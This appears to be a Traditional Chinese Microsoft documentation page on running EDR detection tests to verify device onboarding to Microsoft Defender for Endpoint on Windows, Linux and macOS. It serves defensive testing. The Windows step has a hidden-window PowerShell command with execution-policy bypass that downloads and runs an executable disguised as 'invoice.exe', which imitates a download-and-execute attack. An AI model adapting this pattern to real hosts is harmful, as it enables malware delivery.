用於驗證裝置上線和 Reporting Services 的 EDR 偵測測試
適用於:
案例需求和設定
- Windows 11,Windows 10 版本 1709 組建 16273 或更新版本、Windows 8.1 或 Windows 7 SP1。
- Windows Server 2022、Windows Server 2019、Windows Server 2016、Windows Server 2012 R2 和 Windows Server 2008 R2 SP1。
- Linux
- macOS
- 適用於端點的 Microsoft Defender
- Linux 上適用於端點的 Microsoft Defender
- macOS 上適用於端點的 Microsoft Defender
端點的端點偵測和回應提供近乎即時且可採取動作的進階攻擊偵測。 安全性分析人員可以有效地排定警示的優先順序、深入了解入侵的全貌,並採取回應動作來補救威脅。
執行 EDR 偵測測試,以確認裝置已正確上線,並回報給服務。 在新上線的裝置上執行下列步驟:
Windows
開啟命令提示字元視窗
在提示字元中,複製並執行下列命令。 命令提示字元視窗會自動關閉。
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
- 如果成功,偵測測試會標示為已完成,並在幾分鐘內出現新的警示。
Linux
- 將 腳本文件 下載到已上線的Linux伺服器
curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/LinuxDIY
- 擷取 zip
unzip ~/Downloads/MDE Linux DIY.zip
- 然後執行下列命令:
./mde_linux_edr_diy.sh
幾分鐘后,應該會在 Microsoft Defender 全面偵測回應 中引發偵測。
- 查看警示詳細數據、計算機時間軸,並執行一般調查步驟。
macOS
在您的瀏覽器 Microsoft Edge for Mac 或 Safari 中,從 下載 MDATP MacOS DIY.zip 並加以 https://aka.ms/mdatpmacosdiy 擷取。
下列提示隨即出現:
您要在「mdatpclientanalyzer.blob.core.windows.net」上允許下載嗎?
您可以變更哪些網站可以在 [ 網站喜好設定] 中下載檔。按兩下 [允許]。
開 啟 [下載]。
您必須能夠看到 MDATP MacOS DIY。
提示
如果您按兩下 [MDATP MacOS DIY],您會收到下列訊息:
無法開啟 「MDATP MacOS DIY」,因為開發人員無法進行驗證。
macOS 無法確認此應用程式沒有惡意代碼。
[移至垃圾桶][取消]按一下 [取消]。
以滑鼠右鍵按兩下 [MDATP MacOS DIY],然後按兩下 [ 開啟]。
系統會顯示下列訊息:
macOS 無法驗證 MDATP MacOS DIY 的開發人員。 您確定要開啟它嗎?
藉由開啟此應用程式,您將會覆寫系統安全性,這會將計算機和個人資訊公開給可能會損害 Mac 或危害您隱私權的惡意代碼。按一下 [開啟]。
系統會顯示下列訊息:
適用於端點的 Microsoft Defender - macOS EDR DIY 測試檔案
MDATP 入口網站中將會提供對應的警示。按一下 [開啟]。
幾分鐘後會引發警示 macOS EDR 測試警示 。
移至 Microsoft Defender 入口網站 (https://security.microsoft.com/) 。
移至 警示 佇列。
macOS EDR 測試警示會顯示嚴重性、類別、偵測來源,以及已折疊的動作功能表。
查看警示詳細數據和裝置時間軸,並執行定期調查步驟。
您可以考慮執行的後續步驟是視需要新增 AV 排除專案,以符合應用程式相容性或效能:
意見反應
即將登場:在 2024 年,我們將逐步淘汰 GitHub 問題作為內容的意見反應機制,並將它取代為新的意見反應系統。 如需詳細資訊,請參閱:https://aka.ms/ContentUserFeedback。
提交並檢視相關的意見反應